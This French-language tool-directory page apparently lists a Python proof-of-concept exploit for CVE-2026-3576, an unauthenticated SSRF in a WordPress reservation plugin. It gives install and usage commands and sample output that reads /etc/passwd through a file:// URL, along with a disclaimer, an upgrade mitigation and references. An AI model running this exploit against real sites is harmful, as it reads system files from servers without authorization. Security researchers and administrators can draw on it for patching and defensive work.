Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-3576 — Exploit de preuve de concept pour CVE-2026-3576 | Kitploit
Outils/GitHubGitHub/anirbala98/cve-2026-3576
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubanirbala98/cve-2026-3576

CVE-2026-3576

Exploit de preuve de concept pour CVE-2026-3576

Voir le dépôt
2116il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-3576 - Plugin Wordpress Planyo Online Reservation System <= 3.0 - Lecture arbitraire de fichiers via SSRF

Ce dépôt contient un exploit Proof of Concept (PoC) basé sur Python pour CVE-2026-3576. Il est également disponible dans Exploit-DB ici.

J'ai également développé un module Metasploit pour cet exploit, disponible ici.

Avertissement

Ce projet est fourni à des fins éducatives et pour des tests de sécurité autorisés uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.

Aperçu

Une vulnérabilité de type Server Side Request Forgery (SSRF) existe dans le plugin Planyo Online Reservation System de WordPress avant la version 3.1. Elle permet à un attaquant non authentifié de fournir une URL file:// via le paramètre ulap_url, entraînant un accès arbitraire aux fichiers.

Une analyse détaillée avec analyse du code source et démonstration de l'exploit est disponible sur mon blog Medium.

Version affectée

ComposantVersion
Plugin vulnérable<=3.0
Plugin corrigé3.1

Prérequis

  • Python 3.13.14
  • Requests 2.32.5

Installation

git clone https://github.com/anirbala98/CVE-2026-3576.git
cd CVE-2026-3576/
pip install -r requirements.txt

Utilisation

python exploit.py <base_url> -f <file location> --disable-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

Exemple

└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Checking if target is vulnerable...
[+] Version found: 2.9
[+] Target is vulnerable

[*] Attempting to read arbitrary file...

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Atténuation

Mettez à jour le plugin vers la version 3.1.

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2026-3576
  • https://www.planyo.com/wordpress-reservation-system/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
  • https://www.exploit-db.com/exploits/52636
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/wp_planyo_lfi_cve_2026_3576.rb
  • https://anirbala98.medium.com/from-source-code-to-exploit-understanding-cve-2026-3576-3fa9754bd8d3
Télécharger l’outil